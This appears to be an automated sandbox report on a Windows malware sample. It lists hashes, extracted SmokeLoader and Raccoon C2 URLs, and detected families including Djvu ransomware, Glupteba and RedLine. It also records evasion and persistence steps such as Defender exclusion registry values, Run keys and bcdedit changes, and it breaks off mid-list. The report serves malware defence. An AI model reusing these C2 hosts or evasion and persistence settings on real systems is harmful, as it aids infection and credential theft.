Analysis
-
max time kernel
109s -
max time network
134s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
16-02-2021 18:57
Static task
static1
Behavioral task
behavioral1
Sample
df73c80c3b297b161dd6681a354b9392.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
df73c80c3b297b161dd6681a354b9392.exe
Resource
win10v20201028
Errors
General
-
Target
df73c80c3b297b161dd6681a354b9392.exe
-
Size
1.9MB
-
MD5
df73c80c3b297b161dd6681a354b9392
-
SHA1
3db99991178812a5d4f5f7468151055884109699
-
SHA256
3e43a04b037b6e092c352fcf85eef535cf036ee8a4b7100cb15f7343ab2b097f
-
SHA512
58d611a2d0e328a36239e04bcf145e51076b9bb7ef113db732812ddda76d71064acab13ae1abc7264f8eb9ce60118f7bc94ef9c484327cfda33a59e16394a8e6
Malware Config
Extracted
metasploit
windows/single_exec
Extracted
smokeloader
2020
http://naritouzina.net/
http://nukaraguasleep.net/
http://notfortuaj.net/
http://natuturalistic.net/
http://zaniolofusa.net/
http://4zavr.com/upload/
http://zynds.com/upload/
http://atvua.com/upload/
http://detse.net/upload/
http://dsdett.com/upload/
http://dtabasee.com/upload/
http://yeronogles.monster/upload/
Extracted
smokeloader
2019
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
Extracted
raccoon
ca73854068eef038c890b088b37802c3f505993c
-
url4cnc
https://tttttt.me/h_biggsize_1
Extracted
raccoon
9ba64f4b6fe448911470a88f09d6e7d5b92ff0ab
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
mpcmdrun.exepid process 5248 mpcmdrun.exe -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
Glupteba Payload 6 IoCs
Processes:
resource yara_rule behavioral2/memory/1392-71-0x0000000000400000-0x0000000000C1D000-memory.dmp family_glupteba behavioral2/memory/1392-124-0x0000000002C20000-0x0000000003424000-memory.dmp family_glupteba behavioral2/memory/1392-129-0x0000000000400000-0x0000000000C1D000-memory.dmp family_glupteba behavioral2/memory/5932-317-0x0000000000400000-0x0000000000C1B000-memory.dmp family_glupteba behavioral2/memory/5932-321-0x0000000002C10000-0x0000000003412000-memory.dmp family_glupteba behavioral2/memory/5932-322-0x0000000000400000-0x0000000000C1B000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 14 IoCs
Processes:
resource yara_rule behavioral2/memory/5404-275-0x0000000004980000-0x00000000049AE000-memory.dmp family_redline behavioral2/memory/5404-279-0x0000000004B80000-0x0000000004BAC000-memory.dmp family_redline behavioral2/memory/4756-360-0x0000000000720000-0x000000000074E000-memory.dmp family_redline behavioral2/memory/4756-364-0x00000000025F0000-0x000000000261C000-memory.dmp family_redline behavioral2/memory/4820-378-0x0000000002170000-0x000000000219C000-memory.dmp family_redline behavioral2/memory/4820-380-0x00000000023E0000-0x000000000240A000-memory.dmp family_redline behavioral2/memory/2704-406-0x0000000004A50000-0x0000000004A7F000-memory.dmp family_redline behavioral2/memory/2704-408-0x0000000004BC0000-0x0000000004BEE000-memory.dmp family_redline behavioral2/memory/5656-444-0x0000000002510000-0x000000000253F000-memory.dmp family_redline behavioral2/memory/5656-446-0x00000000027A0000-0x00000000027CE000-memory.dmp family_redline behavioral2/memory/5284-467-0x0000000002640000-0x000000000266F000-memory.dmp family_redline behavioral2/memory/5284-470-0x00000000028F0000-0x000000000291E000-memory.dmp family_redline behavioral2/memory/1576-507-0x0000000002640000-0x000000000266F000-memory.dmp family_redline behavioral2/memory/1576-513-0x00000000029B0000-0x00000000029DE000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs
Processes:
svchost.exedescription pid process target process PID 4260 created 1392 4260 svchost.exe app.exe PID 4260 created 1800 4260 svchost.exe csrss.exe PID 4260 created 1800 4260 svchost.exe csrss.exe PID 4260 created 1800 4260 svchost.exe csrss.exe PID 4260 created 1800 4260 svchost.exe csrss.exe PID 4260 created 5932 4260 svchost.exe 6CFB.exe -
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\is-4OANL.tmp\ApiTool.dll acprotect \Users\Admin\AppData\Local\Temp\is-4OANL.tmp\ApiTool.dll acprotect -
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Modifies boot configuration data using bcdedit 15 IoCs
Processes:
bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exepid process 5928 bcdedit.exe 5968 bcdedit.exe 6008 bcdedit.exe 6048 bcdedit.exe 6088 bcdedit.exe 6140 bcdedit.exe 5208 bcdedit.exe 5012 bcdedit.exe 5016 bcdedit.exe 5216 bcdedit.exe 5400 bcdedit.exe 3948 bcdedit.exe 4308 bcdedit.exe 5608 bcdedit.exe 5604 bcdedit.exe -
Drops file in Drivers directory 6 IoCs
Processes:
dsefix.execsrss.exeupdatewin2.exeDrvInst.exedescription ioc process File created C:\Windows\system32\drivers\VBoxDrv.sys dsefix.exe File created C:\Windows\System32\drivers\Winmon.sys csrss.exe File opened for modification C:\Windows\System32\drivers\etc\hosts updatewin2.exe File opened for modification C:\Windows\System32\drivers\SETE65E.tmp DrvInst.exe File created C:\Windows\System32\drivers\SETE65E.tmp DrvInst.exe File opened for modification C:\Windows\System32\drivers\tap0901.sys DrvInst.exe -
Executes dropped EXE 62 IoCs
Processes:
multitimer.exemultitimer.exemultitimer.exe4erji2va4ov.exe3aa05242ojx.exesafebits.exe0znomdw24e2.exesetup_10.2_us3.exeapp.exevict.exevpn.exeSetup3310.exe0znomdw24e2.tmpsetup_10.2_us3.tmpvpn.tmpvict.tmpSetup3310.tmpqlempdtjbuk.exeseed.sfx.exeM7PPVTFT7.exeseed.exeSetup.exeSetup.tmptapinstall.exewinlthst.exeapp.execsrss.exetapinstall.exepatch.exemask_svc.exemask_svc.exemask_svc.exedsefix.exe33C3.exeuP11qo3Gz.exe37FA.exewindefender.exewindefender.exe44BC.exe477D.exe33C3.exe4DB7.exe5951.exe5EE0.exeupdatewin1.exe5EE0.exeupdatewin2.exeupdatewin.exe5.exe6672.exejfiag3g_gg.exe6CFB.exe6FCB.exe6CFB.exejfiag3g_gg.exeCEF3.tmp.exeupdatewin1.exeD676.tmp.exeDC24.tmp.exeE2AD.tmp.exeE9F2.tmp.exeEF13.tmp.exepid process 2484 multitimer.exe 3812 multitimer.exe 2060 multitimer.exe 3260 4erji2va4ov.exe 3144 3aa05242ojx.exe 2000 safebits.exe 2560 0znomdw24e2.exe 3020 setup_10.2_us3.exe 1392 app.exe 2824 vict.exe 2112 vpn.exe 1428 Setup3310.exe 3384 0znomdw24e2.tmp 1420 setup_10.2_us3.tmp 1228 vpn.tmp 3292 vict.tmp 2520 Setup3310.tmp 4124 qlempdtjbuk.exe 4196 seed.sfx.exe 4460 M7PPVTFT7.exe 4780 seed.exe 5024 Setup.exe 5064 Setup.tmp 3260 tapinstall.exe 1896 winlthst.exe 4984 app.exe 1800 csrss.exe 4848 tapinstall.exe 5344 patch.exe 5556 mask_svc.exe 5644 mask_svc.exe 5788 mask_svc.exe 5592 dsefix.exe 5664 33C3.exe 5952 uP11qo3Gz.exe 6036 37FA.exe 6076 windefender.exe 4384 windefender.exe 5404 44BC.exe 5732 477D.exe 4948 33C3.exe 812 4DB7.exe 3296 5951.exe 6136 5EE0.exe 6096 updatewin1.exe 5372 5EE0.exe 800 updatewin2.exe 3140 updatewin.exe 4452 5.exe 5268 6672.exe 3600 jfiag3g_gg.exe 5932 6CFB.exe 5596 6FCB.exe 5620 6CFB.exe 3960 jfiag3g_gg.exe 4032 CEF3.tmp.exe 5976 updatewin1.exe 2472 D676.tmp.exe 4756 DC24.tmp.exe 5548 E2AD.tmp.exe 2704 E9F2.tmp.exe 4820 EF13.tmp.exe -
Modifies Windows Firewall 1 TTPs
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\is-4OANL.tmp\ApiTool.dll upx \Users\Admin\AppData\Local\Temp\is-4OANL.tmp\ApiTool.dll upx behavioral2/memory/6076-253-0x0000000000400000-0x0000000000897000-memory.dmp upx behavioral2/memory/1856-303-0x0000000004490000-0x0000000004491000-memory.dmp upx behavioral2/memory/5164-558-0x0000000000400000-0x00000000047FC000-memory.dmp upx behavioral2/memory/5164-577-0x0000000000400000-0x00000000047FC000-memory.dmp upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation cmd.exe -
Loads dropped DLL 54 IoCs
Processes:
0znomdw24e2.tmpvict.tmpvpn.tmpSetup3310.tmpseed.exeSetup.tmppatch.exemask_svc.exe477D.exe37FA.exe4DB7.exe5EE0.exe5.exe6FCB.exeD676.tmp.exepid process 3384 0znomdw24e2.tmp 3384 0znomdw24e2.tmp 3292 vict.tmp 1228 vpn.tmp 1228 vpn.tmp 3384 0znomdw24e2.tmp 3384 0znomdw24e2.tmp 3384 0znomdw24e2.tmp 2520 Setup3310.tmp 2520 Setup3310.tmp 3384 0znomdw24e2.tmp 3384 0znomdw24e2.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 1228 vpn.tmp 4780 seed.exe 5064 Setup.tmp 5344 patch.exe 5344 patch.exe 5344 patch.exe 5788 mask_svc.exe 5788 mask_svc.exe 5344 patch.exe 5788 mask_svc.exe 5788 mask_svc.exe 5788 mask_svc.exe 5788 mask_svc.exe 5732 477D.exe 1228 vpn.tmp 1228 vpn.tmp 6036 37FA.exe 6036 37FA.exe 6036 37FA.exe 812 4DB7.exe 5372 5EE0.exe 4452 5.exe 4452 5.exe 5596 6FCB.exe 5596 6FCB.exe 5596 6FCB.exe 5596 6FCB.exe 5596 6FCB.exe 5596 6FCB.exe 5596 6FCB.exe 2472 D676.tmp.exe 2472 D676.tmp.exe 2472 D676.tmp.exe 2472 D676.tmp.exe 2472 D676.tmp.exe 2472 D676.tmp.exe 2472 D676.tmp.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
app.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\WildShape = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" app.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\app.exe = "0" app.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 5 IoCs
Processes:
6672.exemultitimer.exe0znomdw24e2.tmpapp.exe33C3.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e" 6672.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\5ieymnmnjuy = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RHO5E1JXEA\\multitimer.exe\" 1 3.1613501834.602c158a98b90" multitimer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\9669986 = "\"C:\\Users\\Admin\\AppData\\Roaming\\xljnjfawui1\\0znomdw24e2.exe\" /VERYSILENT" 0znomdw24e2.tmp Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\WildShape = "\"C:\\Windows\\rss\\csrss.exe\"" app.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\fbcdc5df-e3bd-4382-87b0-4d925fbbd857\\33C3.exe\" --AutoStart" 33C3.exe -
Checks for any installed AV software in registry 1 TTPs 53 IoCs
Processes:
multitimer.exedescription ioc process Key opened \REGISTRY\MACHINE\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\TrendMicro\UniClient multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\IKARUS\anti.virus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Bitdefender\QuickScan multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\KasperskyLab multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Sophos multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\BullGuard Ltd.\BullGuard\Main multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Microsoft Antimalware Setup\StartMenu Microsoft Security Essentials multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\avast! Antivirus multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Doctor Web\InstalledComponents multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\McAfee\DesktopProtection multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\F-Secure\Computer Security\DART multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVG\AV multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Fortinet\FortiClient\installed multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Jiangmin\ComputerID multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ESET\NOD multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\ArcaBit multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\K7 Computing\K7TotalSecurity multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AVP18.0.0 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\DrWebAVService multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\AntiVirService multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\ClamWin\Version multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ClamWin\Version multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McProxy multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AVAST Software\Avast multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet\Services\MBAMProtector multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\FRISK Software\F-PROT Antivirus for Windows multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\a2AntiMalware multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\BavSvc multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Avira\Antivirus multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\COMODO\CIS multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\QHActiveDefense multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\G Data\AntiVirenKit multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\AhnLab\V3IS80 multitimer.exe Key opened \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Vba32\Loader multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\ESET\NOD multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\McAPExe multitimer.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Doctor Web\InstalledComponents multitimer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
5951.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 5951.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 164 ip-api.com 43 ipinfo.io 47 ipinfo.io 125 api.2ip.ua 127 api.2ip.ua 144 api.2ip.ua -
Maps connected drives based on registry 3 TTPs 4 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
multitimer.exemultitimer.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum multitimer.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0 multitimer.exe -
Drops file in System32 directory 17 IoCs
Processes:
DrvInst.exetapinstall.exeDrvInst.exedescription ioc process File opened for modification C:\Windows\System32\DriverStore\Temp\{4d261c0c-ae63-334f-8aa8-08169e8dd441}\SETE489.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{4d261c0c-ae63-334f-8aa8-08169e8dd441}\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{4d261c0c-ae63-334f-8aa8-08169e8dd441}\SETE48B.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{4d261c0c-ae63-334f-8aa8-08169e8dd441}\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{4d261c0c-ae63-334f-8aa8-08169e8dd441}\SETE48B.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{4d261c0c-ae63-334f-8aa8-08169e8dd441} DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF tapinstall.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{4d261c0c-ae63-334f-8aa8-08169e8dd441}\SETE48A.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{4d261c0c-ae63-334f-8aa8-08169e8dd441}\SETE48A.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{4d261c0c-ae63-334f-8aa8-08169e8dd441}\tap0901.cat DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{4d261c0c-ae63-334f-8aa8-08169e8dd441}\SETE489.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF DrvInst.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
mask_svc.exemask_svc.exemask_svc.exepid process 5556 mask_svc.exe 5644 mask_svc.exe 5788 mask_svc.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
5EE0.exedescription pid process target process PID 6136 set thread context of 5372 6136 5EE0.exe 5EE0.exe -
Drops file in Program Files directory 64 IoCs
Processes:
seed.sfx.exevpn.tmpsetup_10.2_us3.tmpvict.tmptapinstall.exedescription ioc process File created C:\Program Files (x86)\Seed Trade\Seed\__tmp_rar_sfx_access_check_259300000 seed.sfx.exe File created C:\Program Files (x86)\MaskVPN\is-L77MA.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-R3BA3.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-AKBSJ.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-29TO4.tmp vpn.tmp File created C:\Program Files (x86)\FamTips\unins000.dat setup_10.2_us3.tmp File created C:\Program Files (x86)\FamTips\is-NNAFQ.tmp setup_10.2_us3.tmp File created C:\Program Files (x86)\FamTips\is-FQENH.tmp setup_10.2_us3.tmp File created C:\Program Files (x86)\FamTips\images\is-V1C62.tmp setup_10.2_us3.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-92MAU.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-D36A9.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\mask_svc.exe vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-8UBU5.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-1VMNE.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-708MQ.tmp vpn.tmp File created C:\Program Files (x86)\FamTips\is-5SB10.tmp setup_10.2_us3.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libMaskVPN.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-87MR3.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-BBALN.tmp vpn.tmp File opened for modification C:\Program Files (x86)\FamTips\DreamTrip.exe setup_10.2_us3.tmp File created C:\Program Files (x86)\FamTips\images\is-I84F5.tmp setup_10.2_us3.tmp File created C:\Program Files (x86)\viewerise\is-B25NA.tmp vict.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-8PP08.tmp vpn.tmp File created C:\Program Files (x86)\FamTips\images\is-CSV86.tmp setup_10.2_us3.tmp File created C:\Program Files (x86)\FamTips\images\is-2JFFP.tmp setup_10.2_us3.tmp File created C:\Program Files (x86)\MaskVPN\unins000.dat vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-9B1HI.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-6JRLV.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-F4JKQ.tmp vpn.tmp File opened for modification C:\Program Files (x86)\FamTips\seed.sfx.exe setup_10.2_us3.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libCommon.dll vpn.tmp File opened for modification C:\Program Files (x86)\Seed Trade seed.sfx.exe File created C:\Program Files (x86)\MaskVPN\is-9RJ6O.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-RPFIU.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-KABDH.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-VEDUD.tmp vpn.tmp File created C:\Program Files (x86)\FamTips\is-ISPLP.tmp setup_10.2_us3.tmp File created C:\Program Files (x86)\FamTips\images\is-GA7GP.tmp setup_10.2_us3.tmp File created C:\Program Files (x86)\FamTips\images\is-S8A1P.tmp setup_10.2_us3.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libeay32.dll vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-QQNQJ.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-TOLJE.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp64\is-VBP61.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp64\devcon.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-HH2TG.tmp vpn.tmp File created C:\Program Files\M7PPVTFT73\uninstaller.exe tapinstall.exe File created C:\Program Files\M7PPVTFT73\uninstaller.exe.config tapinstall.exe File created C:\Program Files (x86)\FamTips\images\is-1ELJL.tmp setup_10.2_us3.tmp File created C:\Program Files (x86)\FamTips\images\is-8AA8I.tmp setup_10.2_us3.tmp File created C:\Program Files (x86)\FamTips\images\is-29GA1.tmp setup_10.2_us3.tmp File created C:\Program Files (x86)\FamTips\images\is-O4EMK.tmp setup_10.2_us3.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-7JG16.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\win732\tapinstall.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-3KIOC.tmp 